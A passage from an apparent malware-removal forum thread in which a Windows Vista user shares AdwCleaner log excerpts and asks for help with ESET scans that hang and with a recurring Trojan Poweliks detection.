HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D} Key Found: HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472} Key Found: HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD} Key Found: HKLM\SOFTWARE\Classes\CLSID\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96} Key Found: HKLM\SOFTWARE\Classes\CLSID\{E15A9BFD-D16D-496D-8222-44CADF316E70} Key Found: HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000} Key Found: HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF} Key Found: HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF} Key Found: HKLM\SOFTWARE\Classes\CLSID\{0015CAC9-FC30-4CD0-BFAA-7412CC2C4DD9} Key Found: 
No malicious Chromium based browser items found.
*************************
C:\AdwCleaner\AdwCleaner[s0].txt - [14631 Bytes] - [27/08/2016 19:51:40]
C:\AdwCleaner\AdwCleaner[s1].txt - [13756 Bytes] - [27/08/2016 20:22:16]
########## EOF - C:\AdwCleaner\AdwCleaner[s1].txt - [13830 Bytes] ##########

I have had a lot of problems with the online ESET scan. I do not use Internet Explorer as Vista quit updating and my version is long out of date. I use Mozilla Firefox. I disabled Ad-Aware but it still seemed to recognize its presence on the computer. The first time I ran the scan it found 8 threats and hung up before the scan was complete, so I could not retrieve a report. I had to end the scan through Task Manager. The second time I ran the scan it found 11 threats and hung up before the scan was completed, so again no report, but before I could end the process it started cleaning the threats even though I did not have that box checked. I have no idea what was deleted from my computer from this scan. I tried it a third time and it found one threat and again hung up before the scan was finished. After this I gave up as I don't want any more files deleted from my computer without my knowledge. Therefore I do not have a txt file to include from the ESET online scan. I hope this will be enough to help without the last scan.

Fixlog.txt AdwCleaner.txt
  5. I have too many logs to send in one reply. Here are the initial attachments, a copy of the emails and what logs I could fit in. I'll have to send additional logs in another reply. Addition.txt FRST.txt
  6. I do a full scan and get back a report that finds Trojan viruses on computer that will be deleted on reboot. I reboot the computer and receive the message that the viruses were successfully deleted. I do another full scan and get a report that the viruses are there but will be deleted on reboot and the scenario starts all over again. How can I disinfect and remove these Trojan viruses? I have seen both Trojan Poweliks.Gen.1 twice at the same time and Trojan Poweliks.Gen.2 once with Windows System32 regsvr. Trojan Gen.2 has disappeared. Both Trojan Poweliks Gen 1 cannot be deleted. I have also attached logs that were attached to my email [Request ID ##468513##]. Please advise if you have any ideas I might try to resolve this problem. logs.zip